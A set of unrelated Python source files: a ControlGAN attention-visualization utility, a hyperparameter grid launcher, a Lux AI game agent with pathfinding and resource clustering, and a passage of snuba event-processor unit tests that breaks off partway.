the-stack_106_24257
"""Adapted from: https://github.com/mrlibw/ControlGAN""" import numpy as np import torch import torch.nn as nn import skimage.transform from PIL import Image, ImageDraw, ImageFont def normalize(similarities, method="norm"): if method == "norm": return (similarities - similarities.mean(axis=0)) / (similarities.std(axis=0)) elif method == "standardize": return (similarities - similarities.min(axis=0)) / ( similarities.max(axis=0) - similarities.min(axis=0) ) else: raise Exception("normalizing method not implemented") # For visualization ################################################ COLOR_DIC = { 0: [128, 64, 128], 1: [244, 35, 232], 2: [70, 70, 70], 3: [102, 102, 156], 4: [190, 153, 153], 5: [153, 153, 153], 6: [250, 170, 30], 7: [220, 220, 0], 8: [107, 142, 35], 9: [152, 251, 152], 10: [70, 130, 180], 11: [220, 20, 60], 12: [255, 0, 0], 13: [0, 0, 142], 14: [119, 11, 32], 15: [0, 60, 100], 16: [0, 80, 100], 17: [0, 0, 230], 18: [0, 0, 70], 19: [0, 0, 0], 20: [128, 64, 128], 21: [244, 35, 232], 22: [70, 70, 70], 23: [102, 102, 156], 24: [190, 153, 153], 25: [153, 153, 153], 26: [250, 170, 30], 27: [220, 220, 0], 28: [107, 142, 35], 29: [152, 251, 152], 30: [70, 130, 180], 31: [220, 20, 60], 32: [255, 0, 0], 33: [0, 0, 142], 34: [119, 11, 32], 35: [0, 60, 100], 36: [0, 80, 100], 37: [0, 0, 230], 38: [0, 0, 70], 39: [0, 0, 0], 40: [128, 64, 128], 41: [244, 35, 232], 42: [70, 70, 70], 43: [102, 102, 156], 44: [190, 153, 153], 45: [153, 153, 153], 46: [250, 170, 30], 47: [220, 220, 0], 48: [107, 142, 35], 49: [152, 251, 152], 50: [70, 130, 180], 51: [220, 20, 60], 52: [255, 0, 0], 53: [0, 0, 142], 54: [119, 11, 32], 55: [0, 60, 100], 56: [0, 80, 100], 57: [0, 0, 230], 58: [0, 0, 70], 59: [0, 0, 0], 60: [128, 64, 128], 61: [244, 35, 232], 62: [70, 70, 70], 63: [102, 102, 156], 64: [190, 153, 153], 65: [153, 153, 153], 66: [250, 170, 30], 67: [220, 220, 0], 68: [107, 142, 35], 69: [152, 251, 152], 70: [70, 130, 180], 71: [220, 20, 60], 72: [255, 0, 0], 73: [0, 0, 142], 74: [119, 11, 32], 75: [0, 60, 100], 76: [0, 80, 100], 77: [0, 0, 230], 78: [0, 0, 70], 79: [0, 0, 0], 80: [128, 64, 128], 81: [244, 35, 232], 82: [70, 70, 70], 83: [102, 102, 156], 84: [190, 153, 153], 85: [153, 153, 153], 86: [250, 170, 30], 87: [220, 220, 0], 88: [107, 142, 35], 89: [152, 251, 152], 90: [70, 130, 180], 91: [220, 20, 60], 92: [255, 0, 0], 93: [0, 0, 142], 94: [119, 11, 32], 95: [0, 60, 100], 96: [0, 80, 100], 97: [0, 0, 230], 98: [0, 0, 70], 99: [0, 0, 0], } FONT_MAX = 50 def drawCaption(convas, vis_size, sents, off1=2, off2=2): img_txt = Image.fromarray(convas) fnt = ImageFont.truetype("./FreeMono.ttf", 45) d = ImageDraw.Draw(img_txt) sentence_list = [] word_index_list = [] for i in range(len(sents)): # cap = captions[i].data.cpu().numpy() cap = [w for w in sents[i] if not w.startswith("[")] cap = ["[CLS]"] + cap sentence = [] word_index = [] word = "" for j in range(len(cap)): word += sents[i][j].strip("#") if j == (len(cap)) - 1: word_index.append(j) else: if sents[i][j + 1].startswith("#"): continue else: word_index.append(j) d.text( ((len(sentence) + off1) * (vis_size + off2), i * FONT_MAX), "%s" % (word), font=fnt, fill=(255, 255, 255, 255), ) sentence.append(word) word = "" sentence_list.append(sentence) word_index_list.append(word_index) return img_txt, sents, word_index_list def build_attention_images( real_imgs, attn_maps, max_word_num=None, # TODO: remove nvis=8, rand_vis=False, sentences=None, ): att_sze = attn_maps[0].shape[-1] batch_size = real_imgs.shape[0] word_counts = [] for sent in sentences: 
sent = [s for s in sent if (not s.startswith("#")) and (not s.startswith("["))] word_counts.append(len(sent) + 1) max_word_num = max(word_counts) if rand_vis: loop_idx = np.random.choice(len(real_imgs), size=nvis, replace=False) else: loop_idx = np.arange(nvis) if (att_sze == 17) or (att_sze == 19): vis_size = att_sze * 16 else: vis_size = real_imgs.size(2) text_convas = np.ones( [batch_size * FONT_MAX, (max_word_num + 2) * (vis_size + 2), 3], dtype=np.uint8 ) for i in range(max_word_num): istart = (i + 2) * (vis_size + 2) iend = (i + 3) * (vis_size + 2) text_convas[:, istart:iend, :] = COLOR_DIC[i] real_imgs = nn.Upsample(size=(vis_size, vis_size), mode="bilinear")(real_imgs) # [-1, 1] --> [0, 1] real_imgs.add_(1).div_(2).mul_(255) real_imgs = real_imgs.data.numpy() # b x c x h x w --> b x h x w x c real_imgs = np.transpose(real_imgs, (0, 2, 3, 1)) pad_sze = real_imgs.shape middle_pad = np.zeros([pad_sze[2], 2, 3]) post_pad = np.zeros([pad_sze[1], pad_sze[2], 3]) # batch x seq_len x 17 x 17 --> batch x 1 x 17 x 17 seq_len = max_word_num img_set = [] num = nvis # len(attn_maps) text_map, sentences, word_index_list = drawCaption(text_convas, vis_size, sentences) text_map = np.asarray(text_map).astype(np.uint8) bUpdate = 1 for i in loop_idx: attn = attn_maps[i].cpu().view(1, -1, att_sze, att_sze) # --> 1 x 1 x 17 x 17 attn_max = attn.max(dim=1, keepdim=True) attn = torch.cat([attn_max[0], attn], 1) attn = attn.view(-1, 1, att_sze, att_sze) attn = attn.repeat(1, 3, 1, 1).data.numpy() # n x c x h x w --> n x h x w x c attn = np.transpose(attn, (0, 2, 3, 1)) num_attn = attn.shape[0] # img = real_imgs[i] lrI = img row = [lrI, middle_pad] row_merge = [img, middle_pad] row_beforeNorm = [] minVglobal, maxVglobal = 1, 0 # including first max attention index word_end_list = [0] + [idx + 1 for idx in word_index_list[i]] word_level_attn = [] for j in range(num_attn): one_map = attn[j] if (vis_size // att_sze) > 1: one_map = skimage.transform.pyramid_expand( one_map, sigma=20, upscale=vis_size // att_sze, multichannel=True ) word_level_attn.append(one_map) if j in word_end_list: one_map = np.mean(word_level_attn, axis=0) word_level_attn = [] else: continue row_beforeNorm.append(one_map) minV = one_map.min() maxV = one_map.max() if minVglobal > minV: minVglobal = minV if maxVglobal < maxV: maxVglobal = maxV for j in range(seq_len + 1): if j < len(row_beforeNorm): one_map = row_beforeNorm[j] one_map = (one_map - minVglobal) / (maxVglobal - minVglobal) one_map *= 255 PIL_im = Image.fromarray(np.uint8(img)) PIL_att = Image.fromarray(np.uint8(one_map)) merged = Image.new("RGBA", (vis_size, vis_size), (0, 0, 0, 0)) mask = Image.new("L", (vis_size, vis_size), (210)) merged.paste(PIL_im, (0, 0)) merged.paste(PIL_att, (0, 0), mask) merged = np.array(merged)[:, :, :3] else: one_map = post_pad merged = post_pad row.append(one_map) row.append(middle_pad) row_merge.append(merged) row_merge.append(middle_pad) row = np.concatenate(row, 1) row_merge = np.concatenate(row_merge, 1) txt = text_map[i * FONT_MAX : (i + 1) * FONT_MAX] if txt.shape[1] != row.shape[1]: print("txt", txt.shape, "row", row.shape) bUpdate = 0 break row = np.concatenate([txt, row, row_merge], 0) img_set.append(row) if bUpdate: img_set = np.concatenate(img_set, 0) img_set = img_set.astype(np.uint8) return img_set, sentences else: return None
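As a small, hedged illustration of the `normalize` helper defined above (not part of the original file), both modes operate column-wise on a NumPy array; the array values here are invented for the example.

import numpy as np

# Hypothetical example: the "norm" branch z-scores each column (zero mean,
# unit std), while the "standardize" branch rescales each column to [0, 1],
# matching the two branches of normalize() above.
sims = np.array([[0.1, 0.9],
                 [0.5, 0.3],
                 [0.9, 0.6]])
z_scored = normalize(sims, method="norm")
rescaled = normalize(sims, method="standardize")
print(z_scored.round(2))
print(rescaled.round(2))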
the-stack_106_24258
import os


def combine(x):
    so_far = []
    for i in x[0]:
        if len(x) > 1:
            for j in combine(x[1:]):
                so_far.append(' '.join([i, j]))
        else:
            so_far.append(i)
    return so_far


args = [
    ['100'],
    ['0'],
    ['0.5', '1'],
    ['0.4', '0.8'],
    ['0.97', '0.99']
]

for idx, arg in enumerate(combine(args)):
    os.system('python3 train_model.py {} {}'.format(idx, arg))
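A brief usage sketch of the `combine` helper above (hypothetical, assuming the function defined in this file): it recursively expands the option lists into every space-joined combination, which is what the training loop iterates over.

# Hypothetical check of combine(): each result is one argument string for
# train_model.py, e.g. '100 0 0.5 0.4 0.97'.
grid = [['100'], ['0'], ['0.5', '1'], ['0.4', '0.8'], ['0.97', '0.99']]
for idx, line in enumerate(combine(grid)):
    print(idx, line)   # 1 * 1 * 2 * 2 * 2 = 8 combinations in total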
the-stack_106_24262
import time import heapq from collections import defaultdict, deque from typing import DefaultDict, Dict, List, Tuple, Set import numpy as np from .constants import Constants from .game_map import GameMap, RESOURCE_TYPES from .game_objects import Player, Unit, City, CityTile from .game_position import Position from .game_constants import GAME_CONSTANTS INPUT_CONSTANTS = Constants.INPUT_CONSTANTS class Mission: def __init__(self, unit_id: str, target_position: Position, target_action: str = ""): self.target_position: Position = target_position self.target_action: str = target_action self.unit_id: str = unit_id self.delays: int = 0 # [TODO] some expiry date for each mission def __str__(self): return " ".join([str(self.target_position), self.target_action]) class Missions(defaultdict): def __init__(self): self: DefaultDict[str, Mission] = defaultdict(Mission) def add(self, mission: Mission): self[mission.unit_id] = mission def cleanup(self, player: Player, player_city_tile_xy_set: Set[Tuple], opponent_city_tile_xy_set: Set[Tuple], convolved_collectable_tiles_xy_set: Set[Tuple]): # probably should be a standalone function instead of a method for unit_id in list(self.keys()): mission: Mission = self[unit_id] # if dead, delete from list if unit_id not in player.units_by_id: del self[unit_id] continue unit: Unit = player.units_by_id[unit_id] # if you want to build city without resource, delete from list if mission.target_action and mission.target_action[:5] == "bcity": if unit.cargo == 0: del self[unit_id] continue # if opponent has already built a base, reconsider your mission if tuple(mission.target_position) in opponent_city_tile_xy_set: del self[unit_id] continue # if you are in a base, reconsider your mission if tuple(unit.pos) in player_city_tile_xy_set: del self[unit_id] continue # if your target no longer have resource, reconsider your mission if tuple(mission.target_position) not in convolved_collectable_tiles_xy_set: del self[unit_id] continue def __str__(self): return " ".join([unit_id + " " + str(x) for unit_id,x in self.items()]) def get_targets(self): return [mission.target_position for unit_id, mission in self.items()] def get_targets_and_actions(self): return [(mission.target_position, mission.target_action) for unit_id, mission in self.items()] class DisjointSet: def __init__(self): self.parent = {} self.sizes = defaultdict(int) self.points = defaultdict(int) # tracks resource pile size self.num_sets = 0 def find(self, a, point=0): if a not in self.parent: self.parent[a] = a self.sizes[a] += 1 self.points[a] += point self.num_sets += 1 acopy = a while a != self.parent[a]: a = self.parent[a] while acopy != a: self.parent[acopy], acopy = a, self.parent[acopy] return a def union(self, a, b): a, b = self.find(a), self.find(b) if a != b: if self.sizes[a] < self.sizes[b]: a, b = b, a self.num_sets -= 1 self.parent[b] = a self.sizes[a] += self.sizes[b] self.points[a] += self.points[b] def get_size(self, a): return self.sizes[self.find(a)] def get_point(self, a): return self.points[self.find(a)] def get_groups(self): groups = defaultdict(list) for element in self.parent: leader = self.find(element) if leader: groups[leader].append(element) return groups def get_group_count(self): return sum(self.points[leader] > 1 for leader in self.get_groups().keys()) class Game: # counted from the time after the objects are saved to disk compute_start_time = -1 def _initialize(self, messages): """ initialize state """ self.player_id: int = int(messages[0]) self.turn: int = -1 # get some other 
necessary initial input mapInfo = messages[1].split(" ") self.map_width: int = int(mapInfo[0]) self.map_height: int = int(mapInfo[1]) self.map: GameMap = GameMap(self.map_width, self.map_height) self.players: List[Player] = [Player(0), Player(1)] self.x_iteration_order = list(range(self.map_width)) self.y_iteration_order = list(range(self.map_height)) self.dirs: List = [ Constants.DIRECTIONS.NORTH, Constants.DIRECTIONS.EAST, Constants.DIRECTIONS.SOUTH, Constants.DIRECTIONS.WEST, Constants.DIRECTIONS.CENTER ] self.dirs_dxdy: List = [(0,-1), (1,0), (0,1), (-1,0), (0,0)] def fix_iteration_order(self): ''' Fix iteration order at initisation to allow moves to be symmetric ''' assert len(self.player.cities) == 1 assert len(self.opponent.cities) == 1 px,py = tuple(list(self.player.cities.values())[0].citytiles[0].pos) ox,oy = tuple(list(self.opponent.cities.values())[0].citytiles[0].pos) flipping = False self.y_order_coefficient = 1 self.x_order_coefficient = 1 if px == ox: if py < oy: flipping = True self.y_iteration_order = self.y_iteration_order[::-1] self.y_order_coefficient = -1 idx1, idx2 = 0,2 elif py == oy: if px < ox: flipping = True self.x_iteration_order = self.x_iteration_order[::-1] self.x_order_coefficient = -1 idx1, idx2 = 1,3 else: assert False if flipping: self.dirs[idx1], self.dirs[idx2] = self.dirs[idx2], self.dirs[idx1] self.dirs_dxdy[idx1], self.dirs_dxdy[idx2] = self.dirs_dxdy[idx2], self.dirs_dxdy[idx1] def _end_turn(self): print("D_FINISH") def _reset_player_states(self): self.players[0].units = [] self.players[0].cities = {} self.players[0].city_tile_count = 0 self.players[1].units = [] self.players[1].cities = {} self.players[1].city_tile_count = 0 self.player: Player = self.players[self.player_id] self.opponent: Player = self.players[1 - self.player_id] def _update(self, messages): """ update state """ self.map = GameMap(self.map_width, self.map_height) self.turn += 1 self._reset_player_states() for update in messages: if update == "D_DONE": break strs = update.split(" ") input_identifier = strs[0] if input_identifier == INPUT_CONSTANTS.RESEARCH_POINTS: team = int(strs[1]) # probably player_id self.players[team].research_points = int(strs[2]) elif input_identifier == INPUT_CONSTANTS.RESOURCES: r_type = strs[1] x = int(strs[2]) y = int(strs[3]) amt = int(float(strs[4])) self.map._setResource(r_type, x, y, amt) elif input_identifier == INPUT_CONSTANTS.UNITS: unittype = int(strs[1]) team = int(strs[2]) unitid = strs[3] x = int(strs[4]) y = int(strs[5]) cooldown = float(strs[6]) wood = int(strs[7]) coal = int(strs[8]) uranium = int(strs[9]) unit = Unit(team, unittype, unitid, x, y, cooldown, wood, coal, uranium) self.players[team].units.append(unit) self.map.get_cell(x, y).unit = unit elif input_identifier == INPUT_CONSTANTS.CITY: team = int(strs[1]) cityid = strs[2] fuel = float(strs[3]) lightupkeep = float(strs[4]) self.players[team].cities[cityid] = City(team, cityid, fuel, lightupkeep) elif input_identifier == INPUT_CONSTANTS.CITY_TILES: team = int(strs[1]) cityid = strs[2] x = int(strs[3]) y = int(strs[4]) cooldown = float(strs[5]) city = self.players[team].cities[cityid] citytile = city._add_city_tile(x, y, cooldown) self.map.get_cell(x, y).citytile = citytile self.players[team].city_tile_count += 1 elif input_identifier == INPUT_CONSTANTS.ROADS: x = int(strs[1]) y = int(strs[2]) road = float(strs[3]) self.map.get_cell(x, y).road = road # create indexes to refer to unit by id self.player.make_index_units_by_id() self.opponent.make_index_units_by_id() def 
calculate_features(self, missions: Missions): # load constants into object self.wood_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.WOOD.upper()] self.wood_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.WOOD.upper()] self.coal_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.COAL.upper()] self.coal_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.COAL.upper()] self.uranium_fuel_rate = GAME_CONSTANTS["PARAMETERS"]["RESOURCE_TO_FUEL_RATE"][RESOURCE_TYPES.URANIUM.upper()] self.uranium_collection_rate = GAME_CONSTANTS["PARAMETERS"]["WORKER_COLLECTION_RATE"][RESOURCE_TYPES.URANIUM.upper()] # [TODO] Use constants here self.night_turns_left = (360 - self.turn)//40 * 10 + min(10, (360 - self.turn)%40) self.turns_to_night = (30 - self.turn)%40 self.turns_to_night = 0 if self.turns_to_night > 30 else self.turns_to_night self.turns_to_dawn = (40 - self.turn%40) self.turns_to_dawn = 0 if self.turns_to_dawn > 10 else self.turns_to_dawn self.is_day_time = self.turns_to_dawn == 0 # update matrices self.calculate_matrix() self.calculate_resource_matrix() self.calculate_resource_groups() self.calculate_distance_matrix() self.repopulate_targets(missions) self.heuristics_from_positions: Dict = dict() def init_matrix(self, default_value=0): # [TODO] check if order of map_height and map_width is correct return np.full((self.map_height,self.map_width), default_value) def calculate_matrix(self): # amount of resources left on the tile self.wood_amount_matrix = self.init_matrix() self.coal_amount_matrix = self.init_matrix() self.uranium_amount_matrix = self.init_matrix() self.all_resource_amount_matrix = self.init_matrix() self.player_city_tile_matrix = self.init_matrix() self.opponent_city_tile_matrix = self.init_matrix() self.player_units_matrix = self.init_matrix() self.opponent_units_matrix = self.init_matrix() # if there is nothing on tile self.empty_tile_matrix = self.init_matrix() # if you can build on tile (a unit may be on the tile) self.buildable_tile_matrix = self.init_matrix() for y in self.y_iteration_order: for x in self.x_iteration_order: cell = self.map.get_cell(x, y) is_empty = True is_buildable = True if cell.unit: is_empty = False if cell.unit.team == self.player_id: self.player_units_matrix[y,x] += 1 else: # unit belongs to opponent self.opponent_units_matrix[y,x] += 1 if cell.has_resource(): is_empty = False is_buildable = False if cell.resource.type == RESOURCE_TYPES.WOOD: self.wood_amount_matrix[y,x] += cell.resource.amount if cell.resource.type == RESOURCE_TYPES.COAL: self.coal_amount_matrix[y,x] += cell.resource.amount if cell.resource.type == RESOURCE_TYPES.URANIUM: self.uranium_amount_matrix[y,x] += cell.resource.amount self.all_resource_amount_matrix[y,x] += cell.resource.amount elif cell.citytile: is_empty = False is_buildable = False if cell.citytile.team == self.player_id: self.player_city_tile_matrix[y,x] += 1 else: # city tile belongs to opponent self.opponent_city_tile_matrix[y,x] += 1 if is_empty: self.empty_tile_matrix[y,x] += 1 if is_buildable: self.buildable_tile_matrix[y,x] += 1 # binary matrices self.wood_exist_matrix = (self.wood_amount_matrix > 0).astype(int) self.coal_exist_matrix = (self.coal_amount_matrix > 0).astype(int) self.uranium_exist_matrix = (self.uranium_amount_matrix > 0).astype(int) self.all_resource_exist_matrix = (self.all_resource_amount_matrix > 0).astype(int) # positive if on empty cell and beside the resource 
self.wood_side_matrix = self.convolve(self.wood_exist_matrix) * self.empty_tile_matrix self.coal_side_matrix = self.convolve(self.coal_exist_matrix) * self.empty_tile_matrix self.uranium_side_matrix = self.convolve(self.uranium_exist_matrix) * self.empty_tile_matrix self.convert_into_sets() def populate_set(self, matrix, set_object): # modifies the set_object in place and add nonzero items in the matrix for y in self.y_iteration_order: for x in self.x_iteration_order: if matrix[y,x] > 0: set_object.add((x,y)) def convert_into_sets(self): self.wood_exist_xy_set = set() self.coal_exist_xy_set = set() self.uranium_exist_xy_set = set() self.player_city_tile_xy_set = set() self.opponent_city_tile_xy_set = set() self.player_units_xy_set = set() self.opponent_units_xy_set = set() self.empty_tile_xy_set = set() self.buildable_tile_xy_set = set() for set_object, matrix in [ [self.wood_exist_xy_set, self.wood_exist_matrix], [self.coal_exist_xy_set, self.coal_exist_matrix], [self.uranium_exist_xy_set, self.uranium_exist_matrix], [self.player_city_tile_xy_set, self.player_city_tile_matrix], [self.opponent_city_tile_xy_set, self.opponent_city_tile_matrix], [self.player_units_xy_set, self.player_units_matrix], [self.opponent_units_xy_set, self.opponent_units_matrix], [self.empty_tile_xy_set, self.empty_tile_matrix], [self.buildable_tile_xy_set, self.buildable_tile_matrix]]: self.populate_set(matrix, set_object) self.xy_out_of_map: Set = set() for y in [-1, self.map_height]: for x in range(self.map_width): self.xy_out_of_map.add((x,y)) for y in range(self.map_height): for x in [-1, self.map_width]: self.xy_out_of_map.add((x,y)) # used for distance calculation # out of map - yes # occupied by enemy units or city - yes # occupied by self unit not in city - yes # occupied by self city - no (even if there are units) self.occupied_xy_set = (self.player_units_xy_set | self.opponent_units_xy_set | \ self.opponent_city_tile_xy_set | self.xy_out_of_map) \ - self.player_city_tile_xy_set def calculate_distance_matrix(self, blockade_multiplier_value=100): self.distance_from_edge = self.init_matrix(self.map_height + self.map_width) for y in range(self.map_height): y_distance_from_edge = min(y, self.map_height-y-1) for x in range(self.map_width): x_distance_from_edge = min(x, self.map_height-x-1) self.distance_from_edge[y,x] = y_distance_from_edge + x_distance_from_edge def calculate_distance_from_set(relevant_set): visited = set() matrix = self.init_matrix(default_value=-1) for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in relevant_set: visited.add((x,y)) matrix[y,x] = 0 queue = deque(list(visited)) while queue: x,y = queue.popleft() for dx,dy in [(0,1), (1,0), (0,-1), (-1,0)]: xx, yy = x+dx, y+dy if (xx,yy) in visited: continue if 0 <= xx < self.map_width and 0 <= yy < self.map_height: matrix[yy,xx] = matrix[y,x] + 1 queue.append((xx,yy)) visited.add((xx,yy)) return matrix # calculate distance from resource (with fulfilled research requirements) self.distance_from_collectable_resource = calculate_distance_from_set(self.collectable_tiles_xy_set) # calculate distance from city or tiles self.distance_from_player_assets = calculate_distance_from_set(self.player_units_xy_set | self.player_city_tile_xy_set) self.distance_from_opponent_assets = calculate_distance_from_set(self.opponent_units_xy_set | self.opponent_city_tile_xy_set) self.distance_from_buildable_tile = calculate_distance_from_set(self.buildable_tile_xy_set) # calculating distances from every unit positions and its adjacent 
positions # avoid blocked places as much as possible self.positions_to_calculate_distances_from = set() for unit in self.player.units: x,y = tuple(unit.pos) self.positions_to_calculate_distances_from.add((x,y),) if unit.can_act(): self.positions_to_calculate_distances_from.add((x+1,y),) self.positions_to_calculate_distances_from.add((x-1,y),) self.positions_to_calculate_distances_from.add((x,y+1),) self.positions_to_calculate_distances_from.add((x,y-1),) self.distance_matrix = np.full((self.map_height,self.map_width,self.map_height,self.map_width), 1001) for sy in range(self.map_height): for sx in range(self.map_width): if (sx,sy) not in self.positions_to_calculate_distances_from: continue blockade_multiplier_value_for_syx = blockade_multiplier_value if (sx,sy) in self.player_units_xy_set: blockade_multiplier_value_for_syx = 1 start_pos = (sx,sy) xy_processed = set() d4 = [(1,0),(0,1),(-1,0),(0,-1)] heap = [(0, start_pos),] while heap: curdist, (x,y) = heapq.heappop(heap) if (x,y) in xy_processed: continue xy_processed.add((x,y),) self.distance_matrix[sy,sx,y,x] = curdist for dx,dy in d4: xx,yy = x+dx,y+dy if not (0 <= xx < self.map_width and 0 <= yy < self.map_height): continue if (xx,yy) in xy_processed: continue edge_length = 1 if (xx,yy) in self.occupied_xy_set: edge_length = blockade_multiplier_value_for_syx if (xx,yy) in self.player_city_tile_xy_set: edge_length = blockade_multiplier_value_for_syx heapq.heappush(heap, (curdist + edge_length, (xx,yy))) def retrieve_distance(self, sx, sy, ex, ey): return self.distance_matrix[sy,sx,ey,ex] def convolve(self, matrix): # each worker gets resources from (up to) five tiles new_matrix = matrix.copy() new_matrix[:-1,:] += matrix[1:,:] new_matrix[:,:-1] += matrix[:,1:] new_matrix[1:,:] += matrix[:-1,:] new_matrix[:,1:] += matrix[:,:-1] return new_matrix def calculate_resource_matrix(self): # calculate value of the resource considering the reasearch level self.collectable_tiles_matrix = self.wood_exist_matrix if self.player.researched_coal(): self.collectable_tiles_matrix += self.coal_exist_matrix if self.player.researched_uranium(): self.collectable_tiles_matrix += self.uranium_exist_matrix # adjacent cells collect from the cell as well self.convolved_collectable_tiles_matrix = self.convolve(self.collectable_tiles_matrix) self.collectable_tiles_xy_set = set() # exclude adjacent self.populate_set(self.collectable_tiles_matrix, self.collectable_tiles_xy_set) self.convolved_collectable_tiles_xy_set = set() # include adjacent self.populate_set(self.convolved_collectable_tiles_matrix, self.convolved_collectable_tiles_xy_set) def calculate_resource_groups(self): # compute join the resource cluster and calculate the amount of resource self.xy_to_resource_group_id: DisjointSet = DisjointSet() for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in self.collectable_tiles_xy_set: if (x,y) in self.wood_exist_xy_set or (x,y) in self.uranium_exist_xy_set: self.xy_to_resource_group_id.find((x,y), point=5) else: self.xy_to_resource_group_id.find((x,y), point=1) for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) in self.collectable_tiles_xy_set: for dy,dx in [(1,0),(0,1),(-1,0),(0,-1)]: xx, yy = x+dx, y+dy if 0 <= yy < self.map_height and 0 <= xx < self.map_width: self.xy_to_resource_group_id.union((x,y), (xx,yy)) def repopulate_targets(self, missions: Missions): # with missions, populate the following objects for use # probably these attributes belong to missions, but left it here to avoid circular imports 
pos_list = missions.get_targets() self.targeted_leaders: Set = set(self.xy_to_resource_group_id.find(tuple(pos)) for pos in pos_list) self.targeted_cluster_count = sum(self.xy_to_resource_group_id.get_point((x,y)) > 0 for x,y in self.targeted_leaders) self.targeted_xy_set: Set = set(tuple(pos) for pos in pos_list) - self.player_city_tile_xy_set pos_and_action_list = missions.get_targets_and_actions() self.targeted_for_building_xy_set: Set = \ set(tuple(pos) for pos,action in pos_and_action_list if action and action[:5] == "bcity") - self.player_city_tile_xy_set self.resource_leader_to_locating_units: DefaultDict[Tuple, Set[str]] = defaultdict(set) for unit_id in self.player.units_by_id: unit: Unit = self.player.units_by_id[unit_id] current_position = tuple(unit.pos) leader = self.xy_to_resource_group_id.find(current_position) if leader: self.resource_leader_to_locating_units[leader].add(unit_id) self.resource_leader_to_targeting_units: DefaultDict[Tuple, Set[str]] = defaultdict(set) for unit_id in missions: mission: Mission = missions[unit_id] target_position = tuple(mission.target_position) leader = self.xy_to_resource_group_id.find(target_position) if leader: self.resource_leader_to_targeting_units[leader].add(unit_id) def get_nearest_empty_tile_and_distance(self, current_position: Position, current_target: Position=None) -> Tuple[Position, int]: if self.all_resource_amount_matrix[current_position.y, current_position.x] == 0: if tuple(current_position) not in self.player_city_tile_xy_set: return current_position, 0 nearest_distance = 10**9+7 nearest_position: Position = current_position for y in self.y_iteration_order: for x in self.x_iteration_order: if (x,y) not in self.buildable_tile_xy_set: continue if (x,y) in self.targeted_for_building_xy_set: # we allow units to build at a tile that is targeted but not for building if current_target and (x,y) != tuple(current_target): continue # only build beside a collectable resource if self.distance_from_collectable_resource[y,x] != 1: continue position = Position(x, y) distance = self.retrieve_distance(current_position.x, current_position.y, position.x, position.y) # update best location if distance < nearest_distance: nearest_distance = distance nearest_position = position return nearest_position, nearest_distance
the-stack_106_24263
import calendar import pytest from collections import OrderedDict from datetime import datetime, timedelta from tests.base import BaseEventsTest from snuba import settings from snuba.datasets.factory import enforce_table_writer from snuba.processor import ( InvalidMessageType, InvalidMessageVersion, ProcessedMessage, ProcessorAction, ) from snuba.datasets.events_processor import ( enforce_retention, extract_base, extract_extra_contexts, extract_extra_tags, extract_user ) class TestEventsProcessor(BaseEventsTest): def test_simple(self): processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) for field in ('event_id', 'project_id', 'message', 'platform'): assert processed.data[0][field] == self.event[field] def test_simple_version_0(self): processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((0, 'insert', self.event)) for field in ('event_id', 'project_id', 'message', 'platform'): assert processed.data[0][field] == self.event[field] def test_simple_version_1(self): processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message((0, 'insert', self.event)) == processor.process_message((1, 'insert', self.event, {})) def test_invalid_type_version_0(self): with pytest.raises(InvalidMessageType): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((0, 'invalid', self.event)) def test_invalid_version(self): with pytest.raises(InvalidMessageVersion): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((2 ** 32 - 1, 'insert', self.event)) def test_invalid_format(self): with pytest.raises(InvalidMessageVersion): enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((-1, 'insert', self.event)) def test_unexpected_obj(self): self.event['message'] = {'what': 'why is this in the message'} processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) assert processed.data[0]['message'] == '{"what": "why is this in the message"}' def test_hash_invalid_primary_hash(self): self.event['primary_hash'] = b"'tinymce' \u063a\u064a\u0631 \u0645\u062d".decode('unicode-escape') processed = enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message(self.event) assert processed.data[0]['primary_hash'] == 'a52ccc1a61c2258e918b43b5aff50db1' def test_extract_required(self): now = datetime.utcnow() event = { 'event_id': '1' * 32, 'project_id': 100, 'group_id': 10, 'datetime': now.strftime("%Y-%m-%dT%H:%M:%S.%fZ"), } output = {} extract_base(output, event) output["retention_days"] = enforce_retention( event, datetime.strptime(event['datetime'], settings.PAYLOAD_DATETIME_FORMAT) ) enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_required(output, event) assert output == { 'event_id': '11111111111111111111111111111111', 'project_id': 100, 'group_id': 10, 'timestamp': now, 'retention_days': settings.DEFAULT_RETENTION_DAYS, } def test_extract_common(self): now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 'the message', 'platform': 'the_platform', } data = { 'received': int(calendar.timegm(now.timetuple())), 'culprit': 'the culprit', 'type': 'error', 'version': 6, 'title': 'FooError', 'location': 'bar.py', 'modules': OrderedDict([ ('foo', '1.0'), ('bar', '2.0'), ('baz', None), ]) } output = {} 
enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output == { 'message': u'the message', 'platform': u'the_platform', 'primary_hash': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'received': now, 'culprit': 'the culprit', 'type': 'error', 'version': '6', 'modules.name': [u'foo', u'bar', u'baz'], 'modules.version': [u'1.0', u'2.0', u''], 'title': 'FooError', 'location': 'bar.py', 'search_message': None, } def test_extract_common_search_message(self): now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 'the message', 'platform': 'the_platform', 'search_message': 'the search message', } data = { 'received': int(calendar.timegm(now.timetuple())), } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output['search_message'] == 'the search message' # with optional short message now = datetime.utcnow().replace(microsecond=0) event = { 'primary_hash': 'a' * 32, 'message': 